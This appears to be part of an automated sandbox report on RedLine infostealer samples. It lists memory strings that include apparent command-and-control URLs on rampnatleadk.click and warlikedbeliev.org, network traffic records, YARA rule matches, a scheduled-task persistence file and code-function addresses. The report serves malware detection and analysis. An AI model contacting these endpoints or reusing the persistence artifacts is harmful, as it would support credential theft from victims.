Source: cab7dbccac.exe, 0000001A.00000003.2447779854.000000000544B000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2447499921.000000000544B000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2447842471.0000000005452000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2510871590.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000002.2534292590.0000000000C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/
Source: cab7dbccac.exe, 0000001A.00000003.2510871590.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000002.2534292590.0000000000C27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/2
Source: cab7dbccac.exe, 0000001A.00000003.2510370250.0000000005470000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2479685209.000000000546B000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000002.2532156050.0000000000BC5000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2479383989.0000000005466000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000002.2544448092.00000000053D0000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2504546748.0000000005470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/api
Source: cab7dbccac.exe, 0000001A.00000003.2510370250.0000000005470000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2504546748.0000000005470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/apish
Source: cab7dbccac.exe, 0000001A.00000002.2532156050.0000000000BC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/apiyX
Source: cab7dbccac.exe, 0000001A.00000002.2532156050.0000000000BC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click:443/api
Source: GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://support.mozilla.org
Source: GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: cab7dbccac.exe, 0000001A.00000003.2466936112.00000000056F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp
Source: L8ChrKrbqV.exe, 00000000.00000003.1299159671.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1479834944.000000000114D000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1479963019.00000000011AD000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1423592172.000000000111C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/
Source: L8ChrKrbqV.exe, 00000000.00000003.1299271935.0000000001146000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1299159671.0000000001134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/T
Source: L8ChrKrbqV.exe, 00000000.00000003.1369543614.00000000011AD000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1299024658.0000000001128000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1299271935.0000000001146000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1469372574.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1469372574.000000000114D000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1423527819.000000000114D000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1299159671.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1479834944.000000000114D000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1479834944.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1369612135.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1369543614.000000000118F000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1299159671.000000000112A000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1423662488.00000000059B5000.00000004.00000800.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288100681.000000000112A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api
Source: L8ChrKrbqV.exe, 00000000.00000003.1396869531.00000000011AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiate
Source: L8ChrKrbqV.exe, 00000000.00000003.1369543614.00000000011AD000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1369612135.00000000011B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiingNameT
Source: L8ChrKrbqV.exe, 00000000.00000003.1369450984.0000000005A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/cc
Source: L8ChrKrbqV.exe, 00000000.00000003.1299024658.0000000001113000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288187428.0000000001113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/qE
Source: L8ChrKrbqV.exe, 00000000.00000003.1469372574.0000000001113000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1299024658.0000000001113000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288187428.0000000001113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org:443/api
Source: L8ChrKrbqV.exe, 00000000.00000003.1423592172.0000000001113000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1469372574.0000000001113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org:443/apis
Source: chromecache_123.16.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: L8ChrKrbqV.exe, 00000000.00000003.1371545112.00000000059C4000.00000004.00000800.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1888604381.000000000BE20000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2468243143.000000000545D000.00000004.00000800.00020000.00000000.sdmp, KKFHJJDHJEGHJKECBGCF.9.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
Source: L8ChrKrbqV.exe, 00000000.00000003.1288187428.000000000110C000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288100681.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288062879.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: L8ChrKrbqV.exe, 00000000.00000003.1288292744.0000000001146000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288100681.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288275126.000000000117F000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288100681.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: nss3.dll.9.dr, freebl3.dll.9.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: L8ChrKrbqV.exe, 00000000.00000003.1300387083.00000000059ED000.00000004.00000800.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1300320799.00000000059F0000.00000004.00000800.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1300477914.00000000059ED000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2369781694.000000000540E000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2370112104.000000000540B000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2369965119.000000000540B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: L8ChrKrbqV.exe, 00000000.00000003.1300387083.00000000059ED000.00000004.00000800.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1300320799.00000000059F0000.00000004.00000800.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1300477914.00000000059ED000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2369781694.000000000540E000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2370112104.000000000540B000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2369965119.000000000540B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_123.16.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_123.16.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: L8ChrKrbqV.exe, 00000000.00000003.1371545112.00000000059C4000.00000004.00000800.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1888604381.000000000BE20000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2468243143.000000000545D000.00000004.00000800.00020000.00000000.sdmp, KKFHJJDHJEGHJKECBGCF.9.dr	String found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
Source: GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://www.mozilla.org
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.000000000055C000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.000000000055C000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.000000000055C000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: L8ChrKrbqV.exe, 00000000.00000003.1371226212.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000003.1859861166.000000000C090000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2466936112.00000000056F4000.00000004.00000800.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.000000000055C000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: L8ChrKrbqV.exe, 00000000.00000003.1371226212.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000003.1859861166.000000000C090000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2466936112.00000000056F4000.00000004.00000800.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFBAAEBKF.9.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50041 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001B.00000003.2403419318.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000001B.00000002.2525835050.00000000003B2000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: ab13ed0cb0.exe PID: 7852, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

PE file contains section with special chars

Source: L8ChrKrbqV.exe	Static PE information: section name:
Source: L8ChrKrbqV.exe	Static PE information: section name: .idata
Source: L8ChrKrbqV.exe	Static PE information: section name:
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name:
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name: .idata
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name:
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: section name:
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.10.dr	Static PE information: section name:
Source: skotes.exe.10.dr	Static PE information: section name: .idata
Source: random[1].exe.24.dr	Static PE information: section name:
Source: random[1].exe.24.dr	Static PE information: section name: .idata
Source: d40ec5ca11.exe.24.dr	Static PE information: section name:
Source: d40ec5ca11.exe.24.dr	Static PE information: section name: .idata
Source: random[1].exe0.24.dr	Static PE information: section name:
Source: random[1].exe0.24.dr	Static PE information: section name: .idata
Source: random[1].exe0.24.dr	Static PE information: section name:
Source: cab7dbccac.exe.24.dr	Static PE information: section name:
Source: cab7dbccac.exe.24.dr	Static PE information: section name: .idata
Source: cab7dbccac.exe.24.dr	Static PE information: section name:
Source: random[1].exe1.24.dr	Static PE information: section name:
Source: random[1].exe1.24.dr	Static PE information: section name: .idata
Source: random[1].exe1.24.dr	Static PE information: section name:
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name:
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name: .idata
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBEECD0	9_2_6CBEECD0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB8ECC0	9_2_6CB8ECC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC56C00	9_2_6CC56C00
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB9AC60	9_2_6CB9AC60
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6AC30	9_2_6CC6AC30
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB94DB0	9_2_6CB94DB0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CD1CDC0	9_2_6CD1CDC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC26D90	9_2_6CC26D90
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCBAD50	9_2_6CCBAD50
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC5ED70	9_2_6CC5ED70
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CD18D20	9_2_6CD18D20
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC30EC0	9_2_6CC30EC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC16E90	9_2_6CC16E90
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB9AEC0	9_2_6CB9AEC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC2EE70	9_2_6CC2EE70
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC70E20	9_2_6CC70E20
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB9EFB0	9_2_6CB9EFB0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6EFF0	9_2_6CC6EFF0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB90FE0	9_2_6CB90FE0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD8FB0	9_2_6CCD8FB0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB96F10	9_2_6CB96F10
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC52F70	9_2_6CC52F70
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD0F20	9_2_6CCD0F20
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBFEF40	9_2_6CBFEF40
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC968E0	9_2_6CC968E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC64840	9_2_6CC64840
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBE0820	9_2_6CBE0820
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC1A820	9_2_6CC1A820
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCAC9E0	9_2_6CCAC9E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBC49F0	9_2_6CBC49F0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC209A0	9_2_6CC209A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC4A9A0	9_2_6CC4A9A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC509B0	9_2_6CC509B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBE6900	9_2_6CBE6900
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBC8960	9_2_6CBC8960
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC0CA70	9_2_6CC0CA70
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC3EA00	9_2_6CC3EA00
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC48A30	9_2_6CC48A30
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC96BE0	9_2_6CC96BE0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC30BA0	9_2_6CC30BA0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC2A4D0	9_2_6CC2A4D0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCBA480	9_2_6CCBA480
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBD64D0	9_2_6CBD64D0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF4420	9_2_6CBF4420
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBA8460	9_2_6CBA8460
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC1A430	9_2_6CC1A430
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB845B0	9_2_6CB845B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC5A5E0	9_2_6CC5A5E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC1E5F0	9_2_6CC1E5F0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC94540	9_2_6CC94540
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD8550	9_2_6CCD8550
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC30570	9_2_6CC30570
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF2560	9_2_6CBF2560
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBE8540	9_2_6CBE8540
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC2E6E0	9_2_6CC2E6E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBEE6E0	9_2_6CBEE6E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBB46D0	9_2_6CBB46D0
